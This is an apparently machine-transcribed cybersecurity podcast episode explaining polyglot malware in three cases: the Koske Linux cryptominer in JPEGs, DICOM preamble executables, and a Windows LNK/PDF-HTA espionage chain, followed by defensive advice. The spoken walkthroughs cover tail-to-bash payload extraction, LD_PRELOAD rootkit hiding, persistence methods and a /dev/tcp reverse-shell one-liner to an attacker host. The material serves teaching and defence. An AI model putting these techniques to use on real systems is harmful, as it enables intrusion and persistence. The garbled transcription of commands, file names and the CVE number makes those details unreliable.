Welcome to the Malfunkt10n Radio, powered by God Access. I'm Genesis, your guide into the chaos of cybersecurity, pen testing, and red teaming. From hacking systems to exposing vulnerabilities, we're here to break things and build them back stronger. If it's not malfunctioning, we're not doing it right. Now, over to your hosts, Adam and Eve, for today's breakdown.
Welcome back to the Deep Dive. We are going straight into the digital trenches today, looking at some really advanced threats, stuff that honestly challenges how we even define a computer file.
Indeed. And this deep dive kicks off with something that seems totally harmless, right? You download, say, a cute panda JPEG.
Right.
Your image viewer opens it up, and there it is, adorable panda. Everything looks fine. Your system says it's okay.
But here's the kicker, and it is genuinely shocking. That exact same file, the one showing you the panda, it could also be a fully functional script, just waiting for the right trigger to compromise your whole system.
Yeah, and it's not like corrupted data or some weird glitch. It's engineered. It's digital deception designed very carefully to look perfectly valid to two different types of programs at the exact same time.
Okay, so this is what we're calling polyglot malware, files wearing multiple hats.
That's the term, yeah, polyglots. They literally wear disguises. They act differently depending on how you open them, what program interprets them. Is it an image viewer, a shell interpreter, a PDF reader? The file adapts.
So like a digital shapeshifter? This feels much more advanced than just, a virus hidden inside a standard ZIP file.
Oh, absolutely. If you think about a file like an item of clothing, maybe a polyglot looks like a simple raincoat to your security scanner, looks harmless.
Okay.
But, flip the right cuff maybe, and suddenly it unfolds into a full-blown tactical vest underneath.
That's a great analogy. Hits the nail on the head.
And what's really critical to get is that these polyglots, they're having a major moment right now among, sophisticated attackers.
Why now? What's driving this renaissance?
It's pretty pragmatic, really. They just elegantly bypass a lot of traditional security tools. Especially signature-based ones. Think about it. If a file is technically a valid JPEG, the header bytes are right, the structure conforms to the JPEG standard, your antivirus, it probably won't flag it.
Even if it's hiding like malicious code right after the image data.
Exactly. Even if there are thousands of lines of executable script appended right there, the AV often just stops reading after the valid image part.
And this whole thing works because they're exploiting our trust, right? We just assume file types are what they say they are.
Absolutely. We're trained fundamentally to trust extensions and file types. JPEGs or pictures, PDFs or documents, DICOM files or medical scans, it's automatic.
And those assumptions, they create blind spots, huge ones.
Gold mines for attackers. Everyone from, cyber criminals running basic cryptomining scams on poorly secured Linux boxes, all the way up to nation-state groups targeting critical infrastructure. They love these blind spots.
So the file looks fine to the network scanner, maybe, but it's just waiting to the OS to hand it off to the right program to execute the hidden part.
It's a ticking time bomb, essentially, waiting for the right context.
Okay, so our mission for this deep dive, then, is to get past the theory. We need to really dissect, 3 real-world attacks using these polyglots across different systems.
That's the plan. We'll look at Linux, DICOM, that medical imaging format, and Windows. We want to understand the technical cleverness behind them.
And maybe more importantly, figure out why our traditional defenses keep getting tripped up by these context-dependent threats.
Exactly. Why are they so effective?
Okay, so before we jump into those specific cases, let's lay the groundwork. Technically, how do they even make a file that does two things? What's the core idea of a polyglot file?
Right. So at its heart, a polyglot file is just a single chunk of data, right? A sequence of bytes. But it's structured in such a way that it can be interpreted correctly by 2 or maybe even more different programs or interpreters.
Interpreted correctly being the key phrase there.
Absolutely. The same string of bytes might look like a valid image to, say, a graphics library, and simultaneously look like a valid script to something like the bash shell. It has to work perfectly in both scenarios.
And the simplest way to build one, you mentioned earlier, it's surprisingly basic.
Yeah, the most basic method is just concatenation, literally just stitching 2 files together.
So like using the cat command in Linux.
Exactly. Imagine you have your known good file, let's stick with our panda JPEG, panda14.jpg, and you have a little script, maybe test.esh with some malicious command inside.
Oh.
You just run cat panda14.jpg, test.esh, panda.jpg. That's it. The output file, panda.jpg, now contains the image data, immediately followed by the script's text content.
But how does that work? Why doesn't the image viewer choke on the script data?
Well, that's the crucial insight. You need to understand how these interpreters function. An image viewer, typically, reads the file header, figures out it's a JPEG, reads the image dimensions, the color data, all that stuff.
Okay.
And then somewhere in the JPEG standard, there's usually an end of image marker, a specific sequence of bytes. Once the viewer hits that marker, it just stops processing.
It just ignores anything that comes after?
Pretty much. It got the image data it needed, so it doesn't care about the extra stuff appended at the end. That's why your panda.jpg still opens perfectly fine in Photoshop or whatever. It gracefully ignores the script part.
Okay, so the image part works, but the attacker needs the script part to run. How do they tell the system, hey, skip the picture, run the code at the end?
Right. This is where that context switching comes in and using system utilities cleverly. The attacker knows the malicious script is tacked onto the end. So they need a command that basically says, start reading this file, but skip the first n bytes, where n is the size of the original image.
They know the exact size of the image part.
They have to, or they calculate it. They know exactly where the image ends and the script begins. It's about that byte offset.
So what would that command look like, let's say, on a Linux system?
Often they'll use the tail command. Tail is usually used to see the end of a file.
Yeah, the last few lines.
Right. But it has options. The command might look something like this. Tail -c plus toss JPEG size +1. Panda.jpg bash.
Okay, let's break that down. -e tells tail to count bytes, not lines.
Correct. And the plus JPEG size +1 part is the magic. Let's say the original panda14.jpg was exactly 40,000 bytes long. That expression calculates 40,000 plus 1, so 40,001. The plus sign before it tells tail, start reading from byte number 40,001 onwards.
So it completely skips the first 40,000 bytes, the entire image.
Precisely. Everything after that point, which is our embedded script, gets read by tail.
And then the pipe symbol, the win, just sends that output
straight into the bash interpreter. So the script gets executed immediately without ever needing to be saved as a separate .ish file on the disk, which might get scanned.
That's the key takeaway then. The exact same file acts like a perfect image if you double-click it, but if you feed it to bash with that special tail command,
the hidden script runs stealthily. Its behavior is totally conditional on the context. And that simple principle allows for some incredibly sneaky attacks.
Speaking of sneaky attacks, let's get into our first case study. The Kung Fu Panda cryptominer. Sounds almost cute.
Deceptively so. This campaign, tracked as Koske, specifically targeted Linux servers. And yeah, it hid its entire payload inside these seemingly harmless Panda JPEGs.
And what's really interesting here, the researchers who found this, Aqua Nautilus, they noted it had signs of AI-assisted development.
Yeah, that's a significant point. The implication is that attackers might be using large language models or maybe specialized AI coding tools to help build these complex, evasive malware packages.
So AI could be doing the dirty work of coding the obfuscation.
Potentially, yeah, or at least accelerating it. And AI could maybe generate novel combinations of persistence techniques or evasion tricks much faster than a human could research and code them. It makes it harder for signature-based defenses to keep up because the variations appear so quickly.
Okay, so how does the Koske attack actually work on a Linux server? How does it get in and stay hidden?
Well, the initial entry point is often pretty standard stuff, targeting servers with weak configurations, maybe brute forcing SSH credentials or exploiting known vulnerabilities. Nothing too fancy there usually.
But once they're in?
Once they have that foothold, the compromised server is commanded to download not just one, but 2 of these polyglot JPEGs. And here's the really clever part. They use system tools, like that tail trick we discussed, or maybe custom variations, to extract the malicious code segments directly into memory.
Directly into memory. So it's not written to the hard drive.
Not in a way that traditional scanners looking at files on disk could easily find. They extract the bytes and pipe them straight into, say, a compiler's input stream or directly to an interpreter.
So the actual malicious program, the compiled binary, might never exist as a distinct file on the disk for an EDR tool to scan. It just lives in RAM.
Exactly. That's a major way they bypass initial detection. The download looks like an image. The execution happens in memory, often as an anonymous process without a clear file backing it.
And this payload was 2-part, you said?
Yeah, 2 distinct components extracted from those JPEGs. The first part was actually raw C programming code.
Raw C code, not a script.
Nope. C code. It gets extracted, fed into the GCC compiler on the victim machine, compiling it on the fly, and the result is executed as a shared object, a .so file in Linux terms. And this .so file, it acts as a highly specialized rootkit.
Okay, a rootkit from C code. And the second part?
The second part was a more conventional shell script, also executed from memory, but its job was specifically focused on setting up long-term persistence, making sure the malware survives reboots and admin checks.
Right, persistence. And Koske's methods here were apparently incredibly resilient. This wasn't just a one-off infection.
No, they layered their persistence deep, multiple redundant methods. First, they'd go after the user's login environment. They'd modify files like .bashic or .bosh logout.
Those run every time someone logs in or out via the command line, right?
Exactly. They'd add lines to these files that basically say, hey, also run this other script, usually naming it something innocuous like .bashic.koske.
So even if an admin finds and kills the main malware process, the next time they log in to investigate,
boom! The bashark runs, it re-executes the persistence loader, and the infection potentially starts all over again in their session. Very snaky.
But they didn't just rely on interactive logins, did they?
No, that wouldn't be reliable enough. For system-level persistence, they'd modify critical boot files like etcrc.local, which executes commands late in the boot process. And of course, they'd set up scheduled tasks using cron, like run our check-in script every 30 minutes.
Standard persistence techniques, but layered. And what about if they got root privileges?
If they got root, they went for the gold standard. Setting up a dedicated system service. System does, the init system on almost all modern Linux distros.
Right. It manages services, starts things at boot.
Exactly. They'd create a service, maybe call it shellcosk.service. This service would be configured to basically monitor and manage the malware. If the cryptominer process crashed or if a defender manually killed it,
System would just automatically restart it.
within seconds, usually. It provides that self-healing, highly resilient persistence that's really hard to fully eradicate without finding and disabling the service definition itself.
Okay, let's zero in on that rootkit component you mentioned. The part compiled from C code, you said it was a userland rootkit that hijacks the reader function using LDP reload. That sounds technically dense.
It is, but it's a classic and very effective technique. Let's break it down. LDP reload is an environment variable in Linux. The dynamic linker, the part of the system that loads shared libraries, .so files, when a program starts, checks this variable.
Okay.
If LDP reload is set to point to a specific .so file, the linker is told, hey, before you load the standard system library functions, load the functions from this special library first.
So the attacker can basically insert their own version of a standard system function.
Precisely. They substitute the legitimate function with their malicious one. Now, why target reader?
What does reader normally do?
Reader stands for read directory entry, is the fundamental low-level function that almost all standard admin tools use to list things. When you type ls to see files in a directory, or CSS to see running processes, or use a graphical file manager, under the hood, they're all calling reader or related functions to get that list from the operating system kernel.
I think I see where this is going. If the malware replaces reader with its own version.
Exactly. When an admin types ls, the command calls the malicious reader. The malicious function gets the real list of files from the kernel, but before it hands that list back to the ls command, it filters it. It removes any entry whose name matches the malware's known file names or directories or process names.
So this ls command, or csys, receives a censored list.
A sanitized list. As far as the admin's tool is concerned, those malicious files and processes simply do not exist. The system is effectively lying to the administrator at a very fundamental level, making the malware invisible in user space.
That is incredibly stealthy. Wow. And they didn't stop at hiding files, right? They had network evasion too.
Oh yeah, they were thorough. They wanted to make sure their command and control C2 communication got through, regardless of network defenses. First, the malware would often reset any environment proxy settings.
To avoid corporate web filters.
Right. Make sure the C2 traffic goes direct, not through a monitored proxy. Second, they'd flush the executables rules, the local firewall configuration, just wipe out any existing rules that might block their connection.
Okay.
Third, and this is a big one, they'd rewrite the exresolved.conf file. That file tells the system which DNS servers to use. They'd overwrite it to point to public DNS servers like Cloudflare's 1.1.1.1 or Google's 8.8.8.8.
So if the company network tries to filter malicious domains at its internal DNS level, This bypasses it completely.
Totally bypasses it. The infected machine just ignores the internal DNS and goes straight to the public ones for lookups. And they'd often add one final touch.
That's that.
They'd lock the @cresolve.com file using the command chathall +I that sets the immutable attribute on the file.
Immutable, meaning it can't be changed.
Correct. It can't be deleted, modified, renamed, nothing. Not even by the root user, unless they first explicitly remove that immutable flag with chat.ra. This ensures their custom DNS settings stick around, guaranteeing their C2 path remains open.
Wow. Okay, let's quickly revisit the proof of concept that recreated this. It used 2 polyglot JPEGs, tying it back to our main theme.
Yes, exactly. In the lab setup, they had panda144.jpg. That one contained the main script, persistenceloader.esh. And they had panda144.jpg, which contained the raw C code for the rootkit, the hydepark.c file.
So the attack starts when persistenceloader.esh is extracted from the first panda using that tail command with the right byte offset.
Correct. And that loader script's first job is to orchestrate the next stage. It uses another tail command, this time on panda144.jpg, again knowing the offset, to extract the C code.
Where does it put the C code?
Usually into a temporary memory-backed file system like debshem. That helps with stealth. It's not persistent on disk across reboots, but good for the immediate execution phase.
Then the loader script compiles the C code using GCC right there on the victim machine.
Turns it into a runnable binary, yeah. Then it launches the whole thing, the compiled rootkit, which likely includes the reverse shell logic in the background, often using no-hup so it keeps running even if the initial terminal session closes.
And that persistence loop you mentioned earlier, the constant trying to connect back.
That was cleverly built into the compiled C code itself. It would often include a function to demonize itself, detach from the terminal, run silently, and then, crucially, a main loop, like a one loop in C.
An infinite loop.
Basically, yeah. Inside that loop, it would constantly try to establish or reestablish the reverse shell connection back to the attacker's server, maybe trying every 60 seconds. So if the connection drops for any reason, the malware itself ensures it phones home again within a minute.
And the end result confirmed all those persistence layers. The cron job running frequently, the modified .bashack, and if run as root, that robust system service.
Koske really demonstrates how polyglots are just the delivery mechanism for these incredibly layered, resilient Linux attacks. It's a masterclass in combining polyglot delivery with deep system persistence and evasion.
Okay, that was a really deep dive into Linux and crypto mining. Let's shift gears completely now. We're moving into a super sensitive area, healthcare. Specifically, the DICOM format.
DICOM, yeah. Digital Imaging and Communications in Medicine. It's the universal standard format for pretty much all medical imaging. X-rays, CT scans, MRIs, ultrasounds.
Globally standard.
Globally. And this case study is maybe the ultimate example of exploiting trust. Because we're talking patient data, critical diagnostic tools.
That's like that analogy you used earlier, smuggling contraband in an ambulance.
Exactly. In a busy hospital, transferring patient scans between departments or between machines. Nobody expects that DICOM file itself to be dangerous. The trust is implicit and incredibly high.
So what's the flaw? What's the structural weakness in DICOM that lets attackers turn an X-ray into executable code?
It goes back to the history of the standard, actually. The core issue is how a DICOM file starts. Every valid DICOM file begins with something called a 128-byte preamble.
A preamble, like a little introduction section.
Sort of, yeah. 128 bytes right at the very beginning. This space was included way back for legacy compatibility reasons, allowing files to be maybe stored or recognized on old systems like MS-DOS. But the crucial point is the DICOM standard does not define any specific structure for what goes into those first 128 bytes.
It's just empty space, undefined.
Essentially, yes. Free real estate at the start of the file.
And because it's undefined, medical imaging software just skips over it.
Correct. A proper DICOM viewer looks for a specific 4-byte marker, DICM, which must appear starting at byte 128. It finds that marker and starts reading the actual medical image data from there onwards. It completely ignores whatever might be in those first 128 preamble bytes.
But an operating system shell or a program loader trying to execute the file?
It starts reading from byte 0. And if an attacker has placed executable code right there in that 128-byte preamble,
the OS finds it and runs it while the medical viewer ignores it. Perfect polyglot territory.
Exactly, the ideal hiding spot.
Have researchers actually demonstrated this works in the real world?
Oh, absolutely. Back in 2019, a researcher named Marco Picado-Ortiz showed off something called PIDICOM.
PE, like Windows Portable Executable.
Precisely. He crafted a single file that was both a valid DICOM image, it would open and display a medical scan perfectly fine, and a valid Windows PE executable.
So you could view an X-ray of someone's knee.
But if you just renamed that same file to end in .exe and double-clicked it on Windows, it would execute malware.
Wow. What about non-Windows systems? Lots of medical devices run on Linux or embedded systems, right?
Good point. And researchers at Praetorian demonstrated that with their ELF-DICOM concept, ELF being the Linux executable format.
Executable and linkable format, right?
Yep. They showed you could embed entire Linux ELF binaries either within that 128-byte preamble or even hidden inside some of the DICOM metadata tags later in the file structure. Again, the result was a file that was a perfectly valid medical image and a fully functional Linux executable.
And the danger here is magnified by how these files are shared, isn't it? You mentioned USB drives, CDs.
Yeah, the operational reality in many healthcare settings is that DICOM images get passed around physically. On USB, sticks between departments burned onto CDs for patients to take home or to another clinic, shared over basic network drives.
So these polyglot DICOMs could easily jump air gaps, networks that are supposedly isolated from the internet.
Easily. Because they're coming in on trusted physical media, carrying what everyone assumes is just patient data. This vulnerability, CVE 2019, a little to 97, got a pretty high CVSS score, 7.8, for exactly this reason. It bypasses typical defenses due to that implicit trust.
And it's still exploitable today. Why hasn't this fundamental flaw been patched in the standard?
Because it's not really a flaw in the traditional sense, it's a core design characteristic. That 128-byte preamble is baked into the standard for backward compatibility.
Changing it would break old files and systems.
Millions of them. Think about all the existing medical archives, all the deployed imaging equipment worldwide that expects files to conform to the current standard. If the standard's body suddenly said, okay, no more preamble, or the preamble must be empty, it would cause chaos in global healthcare workflows. It's essentially unpatchable at the file format level.
So mitigation has to happen elsewhere, like how systems handle DICOM files.
Exactly. Monitoring, filtering based on preamble content, behavioral analysis, not changing the file structure itself.
Let's look at the proof of concept for this. How would you actually embed, say, a reverse shell script into that 128-byte preamble?
Researchers use a simple Python script for this. It's quite elegant, really. First, you define your payload. A common one is a short bash reverse shell one-liner, something like setsid bash -dc bash -on dev tcp attacker patch report 0 and 1.
Okay, that connects back to the attacker's machine if executed by bash, but it needs to fit in 128 bytes.
It's tight, but that one-liner is usually short enough. The Python script takes that command string and writes it right at the beginning of the file into the preamble space.
What about the rest of the 128 bytes?
That's critical. You need to fill the remaining space in the preamble, right up to byte 127, with something harmless that won't interfere with shell execution, but also won't break the DICOM structure. Often they just pad it out with comment characters like the hash symbol, hashtag.
Why is filling it precisely so important?
Because the official DICOM magic marker, those 4 letters DICM, must start exactly at byte position 128. If it's off by even 1 byte, any DICOM viewer will reject the file as invalid or corrupt.
So you pad the preamble perfectly, ensuring DICM starts at byte 128.
Exactly. And the result?
Yeah.
You have a file that if you run it as a shell script, bash filename.dcm, the shell executes the reverse shell command hidden in the preamble and ignores the rest. But if you open it in a DICOM viewer,
the viewer ignores the preamble, finds DICM at byte 128, and displays the medical image perfectly.
The perfect dual nature weapon, tailor-made for exploiting trust in a critical sector.
Okay, we've hit Linux servers with pandas, healthcare with X-rays. Now let's turn to Windows. But in a really high-stakes context, a targeted espionage campaign. This is the UNK Crafty Camel campaign.
Yeah, this one was different. Highly targeted, very focused. Researchers found it aimed at fewer than 5 organizations, all within the UAE.
And the targets were significant.
Very. Aviation sector, satellite communications providers, critical transport infrastructure. This wasn't widespread commodity malware. This looked like state-sponsored or highly sophisticated corporate espionage.
And the entry method was classic supply chain compromise, wasn't it? Exploiting trust again.
Textbook case. The malicious emails didn't come from some random address. They appeared to originate from a known trusted business partner, an Indian electronics firm called NDAC Electronics.
But it wasn't really them.
No. The attackers had either compromised the partner or, more likely in this case, registered a type-squatted domain, something like indieselectronics.net instead of the real.com, close enough to fool a busy employee.
So the victim gets an email from a trusted partner with an attachment.
Right. Usually a ZIP file, maybe pretending to be an order list or a product catalog. And inside that ZIP was where the real complexity lay. Multiple layers of deception, like Russian nesting dolls.
What were the files inside this deceptive ZIP?
There were typically 3 key files, all designed to look innocent. First, something named like orderlist.xls.lnk. Note the .lnk extension hidden after .xls.
An LNK file. A Windows shortcut disguised as an Excel spreadsheet.
Exactly, a common living off the land technique. Second, a file like aboutindig.pdf. But this wasn't just a PDF, it was a polyglot, PDF, and HTA.
HTML application.
Yeah, it's a Microsoft thing. Lets you run applications using HTML and scripting. Often flies under the radar of security tools compared to, say, an EXE. And third, another polyglot, electronica2025.pdf. This one was PDF and ZIP.
Okay, PDF HTA and PDF ZIP, plus a disguised shortcut. That's a lot of layers.
Yeah.
How did the execution chain actually work? Walk us through it step by step.
Okay, so step 1. The victim double-clicks the fake Excel file, orderlist.xls.lnk.
Thinking they're opening a spreadsheet.
Right. And the LNK file is clever. First, it does actually open a legitimate but probably blank or decoy Excel file. This happens in the foreground.
To avoid suspicion, the user sees what they expected.
Exactly. But simultaneously, in the background, the LNK file executes a hidden command, usually via PowerShell to make it stealthier.
And what's that hidden command doing?
It calls mshta.exe, the Microsoft HTML application host program. And it points mshta.exe at that first polyglot file, about indic.pdf.
Wait, it tells the HTA interpreter to run a PDF file?
Yes, because it's not just a PDF, it's a PDF HTA polyglot. Windows, when invoked via mshta.exe, recognizes and executes the valid HTA scripting code embedded within the file structure code that a normal PDF reader would simply ignore.
Okay, so step 2. The HTA code inside aboutindic.pdf starts running. This is the orchestrator now.
Correct. This HTA script acts as the main controller for the rest of the infection. Its first job is to get the real payload, which is hidden inside the second polyglot, electronica-2025.pdf.
The PDF ZIP file. How does it extract the hidden ZIP?
It uses another legitimate Windows utility, often tar.exe, which is available natively in recent Windows versions, or sometimes expand.exe. It tells tar to treat electronica2025.pdf as an archive and extract its contents. Because the PDF ZIP polyglot has a valid ZIP archive appended to it, tar just finds it and extracts it.
Where does it extract it to?
Usually somewhere inconspicuous, like the user's music directory or a temp folder. The extracted content is typically the actual malware package, often named something like contents.zip.
This is brilliant misuse of legitimate tools. mshta.exe, tar.exe makes detection based on suspicious processes much harder.
Absolutely. That's the core of living off the land. Blend in with normal activity.
Right.
So inside that extracted contents.zip, you'd find the final stage components, typically things like a loader.exe, maybe a persistence.url file, and a batch script, say sasano.bat.
Okay, so step 3, execution and persistence. The HTA orchestrator triggers this.
Yes. After extracting the ZIP, the HTA script executes the batch file, sasano.bat. This batch file does 2 critical things. Persistence. It copies the persistence.url file into the user's Windows startup folder, but it renames it to something legitimate sounding, like windowsupdate.url.
So the malware relaunches every time the user logs in.
Guaranteed. Second, the batch file executes the loader.exe, passing it a URL as an argument.
What does the loader do?
Its sole purpose is usually to reach out to that URL, download the final payload, often base64 encoded Meterpreter shellcode, which is a powerful remote access Trojan.
Meterpreter, yeah. Common penetration testing tool, but used maliciously here.
Right. The loader downloads this encoded shellcode, decodes it, and then injects it and executes it directly into the memory of a running process or its own process.
Again, avoiding writing the final malware executable to disk, purely in-memory execution.
Yeah.
That's top-tier evasion.
It really is. It bypasses almost all traditional file-based scanning at the final stage.
And you mentioned this final payload, the Sasano backdoor, was interesting in itself.
Yeah, the analysis showed it was written in Go, the programming language, and it was deliberately bloated.
Bloated? How big?
Around 12 megabytes. Which is huge for a backdoor payload like this.
Why make it so big?
Primarily to hinder analysis. Automated sandbox environments and security tools often have file size limits, or just take much longer to analyze very large binaries. It gums up the work, slows down reverse engineering efforts.
Clever counter-analysis technique.
And it had another trick. It apparently used a randomized sleep timer. Before it tried to connect back to its C2 server, it would sleep for a random period, could be a few seconds, could be up to a minute.
How does that help evasion?
Automated sandboxes usually only run a sample for a fixed, relatively short time, maybe 30 seconds, maybe 60 seconds to see what it does. If the malware sleeps longer than the sandbox's observation window before doing anything obviously malicious, like making a network connection,
The sandbox might time out and declare the file clean before it sees the bad activity.
exactly. It's a way to defeat timed, automated analysis.
So, looking back at Crafty Camel, the real danger was that combination. The initial trust bypass via the supply chain, then multiple layers of polyglots using legitimate tools, in-memory execution, and finally, an analysis-resistant payload.
It's the whole package. It screams high-value, target, sophisticated actor.
Yeah.
They needed absolute stealth, and they used every trick in the book, heavily relying on polyglots for those initial stages to achieve it.
Okay, so we've walked through 3 very different scenarios: Linux cryptomining pandas, medical DICOM attacks, and targeted Windows espionage using PDFs and shortcuts.
And if we pull back and look at the common thread, right, across Koske, the DICOM abuse, Crafty Camel, it's always this clever exploitation of how different programs interpret the same file data.
The file is technically valid in one context, JPEG, DICOM, PDF.
While simultaneously carrying that hidden payload that only wakes up when a different interpreter gets hold of it. Bash, msj.exe, tar, the OS loader.
Which brings us back to the big challenge for security teams. If the file looks valid, how do traditional defenses cope, especially signature-based ones?
They often don't. That's the blunt truth. Signature-based detection relies on recognizing known bad patterns of bytes. A well-crafted polyglot might not contain any previously seen malware signatures because its malicious part is custom and its benign part looks perfectly normal.
So security needs to shift focus.
Definitely. We have to move beyond just asking, what is this file, based on its structure or signature. We need to be asking much more aggressively, what is this file doing? We need behavioral analysis.
Okay, so what are the concrete mitigation strategies then if signatures aren't enough?
Well, first and foremost is enhanced behavior monitoring, like you said. Endpoint detection and response, EDR tools, need to be tuned to spot suspicious process chains.
Like
Like an image viewer suddenly spawning a command shell, or a PDF reader launching msj.exe, or tar.exe being invoked by an Office application to unpack something from a weird location. Those cross-process interactions are huge red flags for potential polyglot execution.
what about for specific formats, like DICOM, with known weaknesses?
There, you can get more specific. For DICOM, given that vulnerable 128-byte preamble, organizations really need to implement content filtering at the gateway or on medical devices if possible, specifically scaring that preamble.
Looking for what?
Looking for executable magic bytes, those first few bytes that identify a Windows PE file, MZ, or a Linux ELF file, M7 FELEF. If those appear in the preamble of a file claiming to be a .dcm image, block it, or at least flag it for serious investigation. You could call it preamble whitelisting or blacklisting.
Okay, behavior monitoring, preamble filtering. What else?
User awareness training is still crucial, maybe more than ever.
Because ultimately someone has to click the thing.
Exactly. We've talked about AI-assisted coding, multi-stage C-code injection, memory-only payloads, sophisticated evasion, but almost every single one of these complex attacks still relies on that initial execution trigger.
The user clicking the LNK file disguised as Excel. The admin running the downloaded JPEG through Bash with the wrong command. Someone accepting the USB drive with the DICOM file.
That's the initial point of failure. So even with the most advanced shape-shifting malware out there, human vigilance, that moment of hesitation, that critical thinking, does this email really look right? Should I be running this file this way? That remains probably the single most effective line of defense.
It's a powerful reminder. Even against these incredibly technical threats, the human element is key. If something seems off, even slightly, especially if it arrives unexpectedly, the lesson here is trust, but verify. Because not everything is what it appears to be online.
Indeed. Hiding in plain sight is the polyglot's superpower. But it only works if we stop questioning what we're seeing.
Great insights. Thank you for breaking down these complex threats with us today. And for everyone listening, stay vigilant out there.
Thank you for tuning into the Malfunction Radio powered by God Access. That was a great breakdown from Adam and Eve. It's been a pleasure guiding you through today's deep dive into the world of cybersecurity and red teaming. Remember, if it's not malfunctioning, we're not doing it right. Stay curious, stay secure, and we'll catch you in the next episode. Bye!